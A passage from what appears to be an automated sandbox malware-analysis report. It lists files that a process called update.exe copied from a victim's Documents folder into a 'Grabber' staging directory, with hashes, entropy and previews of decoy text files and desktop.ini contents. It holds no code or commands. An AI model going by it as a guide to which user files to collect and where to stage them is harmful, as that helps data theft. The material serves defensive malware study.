                                                  SHA-512:6B4870B47569942B119533F4C519498D2E7D76FBBD36EC9CAE219BE800864CFA47FC65C98FDDA7D92C0B52F1EA381D7C3D5DC4DE204ABF04CED7F6C43004C1B8
                                                  Malicious:false
                                                  Preview:GIGIYTFFYTJMXILDVGFXDVEFQCHNFYFEULLQEETZRJVMRRJHJRTSPPAOMDMYNAGWNEBMIDVTHKVEEQISBNMPHNFVYDEIXBDPFHYTCLNZABIXDFYKJDBRYRTWDLZOXHMMCFSILUYMHVQPPEGCEUDABQUBALGXBEBBTFQFPGZCSFMMFCTBAMXKOPCAJHDRXWLGLWELWIKNGHWJKDKBDVZPNHUCSZFTPSDHZOUUHUWDVSEAQXIDUUMNXESGKGQYYBWVWCBVILKQLVAXNHJSZYYZUWKUTBRCTNQQXVQCKHLEJIFZFWACZEFAUJYVSEGBIHIZRMKJYWHTJECURPVKKWUKKOFVGYEOSDEDBUWBYBNHTAOSHDXDTPIWBWQANBSHMKUUHFNTKLQLSWCOLNGFZPIBZTKTDJTYYNNHDUOZEFWBJRQDBJTCXGDSCYEYJCUVSMWPBPZCBDOMCVGPOYMXSQANNOXIQBZMOMUCJZXAGIICUFLFDZJOBTEGSAQHEIBBWATDCJXSEIADCNGGARMLYLRJZSIBRRPFAORVDSNHOQWANXTRGLRQZZTEROQRQYBPGYXMSIGOYQMJDIJSQBFLNMQOGKOFUQVIWNLZBQMUSTEPCUCGVOFNLQMYFHDEDLGEYXHBHQNMKSASMZZEYCWBNZKYTKNRWJBUJJTXRIHTHPKRBWIFFKIBKCVEEYOHLCOOBFBXELQKMEOTDDLPFFLMCBOAJRNITAVONLYXBCYITNNXEUAVAVDHVGOGFHPXZDZUUQPRYTGQIFNRRHVDFAGSLTNZENPMFBPWMOHFFCIEPUUGBVHDOBSRPRHEPPLYLJUVAKAYIJRZKMAKRPYDSBIZTPWQFSZBWKYUIQXRDRUUPAWFEQRHVNMAPCFIPTHYPQPAZQNEACARWXUWSRKGERYPPRVAAPAVQYFCPYCRXLJQAMPXGLECYIZDRHPEMJPTXFOJABHMNZZHXHBCYXJEKEEQGKOAGJVHRWOSVEPEFFHDAVPR

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\GRXZDKKVDB.jpg

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.697358951122591
                                                  Encrypted:false
                                                  SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                  MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                  SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                  SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                  SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                  Malicious:false
                                                  Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\GRXZDKKVDB.xlsx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.697358951122591
                                                  Encrypted:false
                                                  SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                  MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                  SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                  SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                  SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                  Malicious:false
                                                  Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\JDDHMPCDUJ.png

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.687055908915499
                                                  Encrypted:false
                                                  SSDEEP:24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
                                                  MD5:94EDB575C55407C555A3F710DF2A8CB3
                                                  SHA1:3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
                                                  SHA-256:DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
                                                  SHA-512:F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
                                                  Malicious:false
                                                  Preview:JDDHMPCDUJFORBKGTIFQHFPQNEKFAIHGBDYZBWNZMVTSZXTGRUOCZPQRXMGXBNMAHGODCTVNAHQHZMJYIYXLTVDMEAVEXSWFQCDVPRSSLREITYMWHUXVVKLPJXQJOHYPAVYXSIMBBOTIWYDKNCDVKZZMEIFEDNNXHAHMYLPOUGNKMPZVDEQRUPZBQCKZDQINFECCUZINROAFGLIAMVWHXPPXOWZMWTITWBJFIENEHRXRHRPVUAIUAJUYDBBSQQMTJJXOAAMHVKJEOIQRSNKKQSGCHAUKUYPJEBZIGZTVKUXZEQOUSZPQBHKFHECDNFGTGIDHSJFVLAKZPDYVJVWECRIKKUCCFNNHBLBFCJEKSUZTITTTLQVOHKFHXFIIYDOZNAIBCDIRXJAYKHCOEXBOGSGEGGQEMHFXIZREOFZJSAFXTGSSZLVKYOANMZNPNESDZMFYWTZHIKUSMZXACWZEIMGTFRSZCGICPOSTZRECQYWZECQVLAWXESWPCDXLHIMJHSZJSDAXNXHETAWLZDXTZAPKBHSMKMYYGVSJCUIJSIFUHHMPIRBASPUOUXKKPQCECQBBZUSIXEOXLFFSQIFCTAIRASCMWEHFOXGEJRXFGJODUTKITHEAKFFJQTQNWWKXXDELWDHHEDWUTMSLXQJPVGOBKELYSRBQFYKXFHWGSCVLTCFKOEJMLUXIZVDPFHXHTSMTDRTVCNLISGJFVQRUTMZDYPUYBAEASZCSEUVHWRIQDEJIZQQHJNTIIICFMMPVLXOIVTPCTDKFPDVWXSBXZDXFUMBJTJMKOOHIMIOAKEJSIDIOJSRMRYXLDVGDBBYXARBNHXOXMBXYOTEFOAXRAUKXTWKYYGWNAHHCIIKQHYAETGBWABTEMJKNTEUQAWGHRIKDGGNHUIVVPPYPYTZERZKDPLUSIKPBDPJOCBYQJDEKAVQKHFTPBZJQOUCVBHAHZZGEXOCYGYDCZICBOETRSJSMVEZKINDRIKZYTUIS

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Music\desktop.ini

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):504
                                                  Entropy (8bit):3.5258560106596737
                                                  Encrypted:false
                                                  SSDEEP:12:QZsiL5wmHOlDmo0qml3lDmo0qmZclLwr2FlDmo0IWUol94klrgl2FlDmo0qjKAZY:QCGwv4o0x34o02lLwiF4o0ZvbUsF4o0Z
                                                  MD5:06E8F7E6DDD666DBD323F7D9210F91AE
                                                  SHA1:883AE527EE83ED9346CD82C33DFC0EB97298DC14
                                                  SHA-256:8301E344371B0753D547B429C5FE513908B1C9813144F08549563AC7F4D7DA68
                                                  SHA-512:F7646F8DCD37019623D5540AD8E41CB285BCC04666391258DBF4C42873C4DE46977A4939B091404D8D86F367CC31E36338757A776A632C7B5BF1C6F28E59AD98
                                                  Malicious:false
                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.0.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.0.8.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.7.....

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Pictures\Camera Roll\desktop.ini

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):190
                                                  Entropy (8bit):3.5497401529130053
                                                  Encrypted:false
                                                  SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
                                                  MD5:D48FCE44E0F298E5DB52FD5894502727
                                                  SHA1:FCE1E65756138A3CA4EAAF8F7642867205B44897
                                                  SHA-256:231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
                                                  SHA-512:A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
                                                  Malicious:false
                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Pictures\Saved Pictures\desktop.ini

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):190
                                                  Entropy (8bit):3.5497401529130053
                                                  Encrypted:false
                                                  SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
                                                  MD5:87A524A2F34307C674DBA10708585A5E
                                                  SHA1:E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
                                                  SHA-256:D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
                                                  SHA-512:7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
                                                  Malicious:false
                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Pictures\desktop.ini

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):504
                                                  Entropy (8bit):3.514398793376306
                                                  Encrypted:false
                                                  SSDEEP:12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
                                                  MD5:29EAE335B77F438E05594D86A6CA22FF
                                                  SHA1:D62CCC830C249DE6B6532381B4C16A5F17F95D89
                                                  SHA-256:88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
                                                  SHA-512:5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
                                                  Malicious:false
                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Videos\desktop.ini

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):504
                                                  Entropy (8bit):3.5218877566914193
                                                  Encrypted:false
                                                  SSDEEP:12:QZsiL5wmHOlDmo0qmclDmo0qmJclLwr2FlDmo0IWVvklrgl2FlDmo0qjKArn:QCGwv4o0o4o0mlLwiF4o090UsF4o01Ar
                                                  MD5:50A956778107A4272AAE83C86ECE77CB
                                                  SHA1:10BCE7EA45077C0BAAB055E0602EEF787DBA735E
                                                  SHA-256:B287B639F6EDD612F414CAF000C12BA0555ADB3A2643230CBDD5AF4053284978
                                                  SHA-512:D1DF6BDC871CACBC776AC8152A76E331D2F1D905A50D9D358C7BF9ED7C5CBB510C9D52D6958B071E5BCBA7C5117FC8F9729FE51724E82CC45F6B7B5AFE5ED51A
                                                  Malicious:false
                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.1.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.9.0.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.9.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.8.....

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\NVWZAPQSQL.docx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6998645060098685
                                                  Encrypted:false
                                                  SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                  MD5:1676F91570425F6566A5746BC8E8427E
                                                  SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                  SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                  SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                  Malicious:false
                                                  Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\NVWZAPQSQL.xlsx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6998645060098685
                                                  Encrypted:false
                                                  SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                  MD5:1676F91570425F6566A5746BC8E8427E
                                                  SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                  SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                  SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                  Malicious:false
                                                  Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\NVWZAPQSQL\EIVQSAOTAQ.png

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.692024230831571
                                                  Encrypted:false
                                                  SSDEEP:24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
                                                  MD5:086908C2D2FAA8C9284EAB6D70682A47
                                                  SHA1:1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
                                                  SHA-256:40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
                                                  SHA-512:02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
                                                  Malicious:false
                                                  Preview:EIVQSAOTAQGMTJLIEKHIWADNDLJLEWUUXVGOFMOKPHABQUHVNBFVSKQIGVIHICGEEXRLSTKQNZUKOHPLLTCYQSLQJMPWPWNUJFUONDXMYCCUPDUBYMPUSUKUOWWSWDLZMDWKNMUKNPKBXAJATSGOQUAMHMZDCDDJRHKOUEDMLSCIOXAHAUFDQKBUBESAKMMFMHDLSSVUQLOZXARPGPMGAAKVDEITBYGGXWIGUIJRVXQOBOIOJWPYSPHZBHWQTMDCUFCWBQSAZNRUOPCLATAERLBPATETXMFUGXBEGMNPKKEZVSRLCYPFEPWIAEINAMGSOXLYWMUKYSQACPSUTGHDCTFLXKAMLOCGYHCMAETHVZNZOCWWUHYAPHFILDNLLBMLSLXIMOFGWTDVLWPHHRGGAWSIGNXEJRIBIBLWFBUASCLZPUIVDERXYLWTNLLRLTFZJTTDGFOEYPFXIPHFKEXHOGEHSFYCCCTGNFQFYETBADKAEAOXYXJWDJWNZPEOBJZTKPLJPPMICDOWUIVDKBQQMHETDORVKZPOWTAZRBAQYYQHBNHIWFZXBILGKHZBLSQJJEIYBHUIDAOEXERQEUMMKBWDXSMLJVAZJQPZARLOBNSTUDCVKLCVBPTKTJWSMPMKSFOQPINFTNEGPVSYCWOXABSGFFKRQDFQEIJWDUMZKILALUHYQZGZOLYMKSAOZGUYCKJOJLYINHVKCTZVXLYIYPGOQZQQAGXVWEBSURTQECDRXYKQAJBEKDNSIHNBZCUBIKPKVWLUOFFCIZSKQBAAPGFMBASMUOKLLGWEHHMYDJCOQEKOBYLYWOOZLBASOJJYLIHZKUGUKHZQBIAVUPYHYEWAYGUFNARHCUKTFMLHSFLRVAELAFCQHPEFUSGNONWLLYQVUVSVEKHDRXJHDSSFJATGDRCTMICJWPFPKKLXECKUXREXEAQNPOBPRKFYRWIWXEWLAPUSHGKXWYYIJNUMGQHBJPMOYZIXPGOJLOQG

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\NVWZAPQSQL\EOWRVPQCCS.jpg

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.692990330209164
                                                  Encrypted:false
